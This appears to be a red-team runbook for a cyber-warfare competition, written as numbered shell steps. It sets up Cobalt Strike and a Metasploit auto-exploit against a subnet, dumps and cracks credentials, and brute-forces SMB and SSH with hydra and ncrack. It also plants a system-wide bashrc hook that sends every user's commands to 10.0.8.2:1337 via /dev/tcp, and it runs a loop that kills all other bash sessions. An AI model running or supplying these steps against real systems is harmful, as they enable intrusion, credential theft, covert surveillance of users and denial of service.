- Figure out what services we would like to host and get them configured
- Assign tasks
- Assign positions
- ???
- Profit
- cd into the
67-CW-Challenge
folder
- Set up the teamserver on the box with (replace IP with the address the team will connect to; the second argument is the teamserver password)
./CobaltStrike/teamserver IP 33NWSIsTheBest ./CobaltStrike/cobalt.profile
- Run Cobalt Strike with
./CobaltStrike/cobaltstrike
2.1. Ensure that a reverse HTTP listener exists called "listener" (later steps assume that exact name)
- Run
msfconsole
setg LHOST 192.168.10.225
setg RHOSTS 192.168.10.0/24
resource ./Metasploit/auto-exploit.rc
- In the Cobalt Strike script console window, type
creds
- Run
mkdir scans; bash scans.sh
(this populates the per-port target lists under ./scans/, such as 445_scan.txt and 22_scan.txt, that the hydra and ncrack steps below read)
- Run
cat creds.txt | cut -d":" -f2 | sed 's/ //g' > hashes.txt
- Run
cat creds.txt | cut -d":" -f1 | sed 's/ //g' > users.txt
- Upload hashes.txt to hashkiller
- Copy the results into
hashkiller.txt
11.1. Run
cat hashkiller.txt | grep -v "No Match" | cut -d" " -f3 | sed 's/ //g' > passwords.txt
- Run
python3 user-pass.py
(this builds user-pass.txt, the login:password pairs that hydra -C consumes in the next step)
- Run
hydra -C user-pass.txt -M ./scans/445_scan.txt smb | tee smb_results.txt
13.1. Run
hydra -C user-pass.txt -M ./scans/22_scan.txt ssh | tee ssh_results.txt
- Run (tee -a appends, so the SSH run does not overwrite the SMB results)
hydra -L users.txt -P passwords.txt -M ./scans/445_scan.txt smb | tee -a results.txt
14.1. Run
hydra -L users.txt -P passwords.txt -M ./scans/22_scan.txt ssh | tee -a results.txt
14.2. Run
ncrack -iL scans/445_scan.txt --pairwise -U users.txt -P passwords.txt -p smb
- Run
cat *results.txt | grep login: > valid_creds.txt
(this picks up hydra's "host: ... login: ... password: ..." lines from both the -C and the -L/-P runs; ncrack prints its hits in a different format, so copy those into valid_creds.txt by hand)
- See if there is a system-wide bashrc
ls -al /etc/bash.bashrc
0.1. If there is, edit it with
vim /etc/bash.bashrc
and add
export PROMPT_COMMAND='RETRN_VAL=$?;echo "$(hostname -I)- $(whoami) [$$]: $(history 1 | sed "s/^[ ]*[0-9]\+[ ]*//" ) [$RETRN_VAL]" > /dev/tcp/10.0.8.2/1337'
(every bash user on the box then sends each command they run, with host, user, PID and exit status, to 10.0.8.2:1337; 10.0.8.2 must be reachable from the box, otherwise their shells stall at each prompt until the connect attempt gives up)
0.2. On your local computer, set up the collector with
ncat -lk 1337 | tee log.txt
0.3. If there isn't, kill every other bash on the box instead:
0.4. while true; do test=$$; ps awux | grep bash | grep -v $test | grep -v grep | awk '{print $2 }' | xargs kill -9 ; sleep 10 ; done
(every 10 seconds this kills every bash except the one running the loop, including your own other sessions, so run it from a shell you intend to keep)